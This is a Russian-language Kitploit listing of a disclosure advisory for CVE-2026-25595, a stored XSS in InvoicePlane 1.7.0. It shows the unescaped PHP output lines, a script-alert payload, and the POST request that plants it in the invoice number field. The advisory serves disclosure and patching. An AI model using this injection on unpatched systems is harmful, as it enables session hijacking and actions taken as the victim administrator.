Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-25595 — # Уязвимость хранимого XSS в InvoicePlane 1.7.0 через несанитизированное поле номера счёта, с доказательством концепции и деталями устранения. | Kitploit
Инструменты/GitHubGitHub/lagathos/cve-2026-25595
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьСтатьи и ИсследованияОбучение и Образование
GitHublagathos/cve-2026-25595

CVE-2026-25595

# Уязвимость хранимого XSS в InvoicePlane 1.7.0 через несанитизированное поле номера счёта, с доказательством концепции и деталями устранения.

Репозиторий
5 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-25595 — Хранимый XSS через номер счёта в InvoicePlane 1.7.0

Уязвимость: Хранимый межсайтовый скриптинг (XSS) через поле «Номер счёта»

Продукт: InvoicePlane

Затронутая версия: 1.7.0 (и, вероятно, более ранние версии)

Серьёзность: Средняя

Оценка CVSS 3.1: 4.8 (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N)

CWE: CWE-79: Некорректная нейтрализация входных данных при генерации веб-страницы

Обнаружил: Leonidas Agathos

Дата отчёта: 2026-01-31


Описание

Поле invoice_number в форме счёта принимает произвольные входные данные без санитизации. Значение сохраняется и выводится без кодирования в нескольких местах: в заголовке страницы просмотра счёта, в поле ввода номера счёта и в виджете последних счетов на панели управления. Вредоносная нагрузка срабатывает всякий раз, когда любой администратор просматривает затронутый счёт или заходит на панель управления.

Уязвимые файлы:

  • application/modules/invoices/views/view.php:247
  • application/modules/invoices/views/view.php:494
  • application/modules/dashboard/views/index.php:233
  • root@kitploit:~
    // view.php - Line 247
    <?php echo trans('invoice') . ' ' . ($invoice->invoice_number ? '#' .
    $invoice->invoice_number : trans('id') . ': ' . $invoice->invoice_id); ?>
    
    // view.php - Line 494
    value="<?php echo $invoice->invoice_number; ?>"
    
    // dashboard/index.php - Line 233
    <?php echo anchor('invoices/view/' . $invoice->invoice_id, ($invoice->invoice_number
        ? $invoice->invoice_number : $invoice->invoice_id)); ?>
    

    Доказательство концепции

    Шаг 1 — Внедрение вредоносной нагрузки в номер счёта

    Создайте или отредактируйте счёт по адресу /index.php/invoices/form/{id} и установите номер счёта:

    root@kitploit:~
    <script>alert("XSS in Invoices")</script>
    

    Запрос:

    root@kitploit:~
    POST /index.php/invoices/ajax/save HTTP/1.1
    Host: 172.25.0.12
    Content-Type: application/x-www-form-urlencoded
    
    invoice_number=<script>alert("XSS+in+Invoices")</script>&invoice_id=22&...
    

    Шаг 1 — Внедрение XSS-нагрузки в поле «Номер счёта» через Burp Suite

    Шаг 2 — Запуск XSS

    Перейдите по адресу /index.php/invoices/view/{id} или /index.php/dashboard. Вредоносная нагрузка срабатывает при загрузке страницы.

    Шаг 2 — XSS срабатывает при просмотре статуса счёта


    Воздействие

    Вредоносная нагрузка выполняется в браузере любого администратора, который просматривает затронутый счёт или заходит на панель управления. Это позволяет перехватывать сессии (если файлы cookie не защищены флагом HttpOnly), похищать CSRF-токены и выполнять действия от имени жертвы.


    Хронология

    ДатаСобытие
    2026-01-30Уязвимость обнаружена
    2026-01-31Разработано доказательство концепции
    2026-01-31Уведомлён поставщик
    2026-02-04Подтверждение поставщиком
    2026-02-04Выпущен патч
    2026-02-05Публичное раскрытие

    Ссылки

    • CWE-79
    • OWASP: Cross-Site Scripting (XSS)
    • CVE-2026-25595

    Отказ от ответственности

    Эта уязвимость была обнаружена в ходе независимого исследования безопасности. Вся информация предоставляется строго в образовательных, исследовательских и защитных целях, чтобы помочь поставщику и сообществу специалистов по безопасности понять и устранить проблему. Любое злонамеренное использование этой информации строго запрещено.

    Скачать инструмент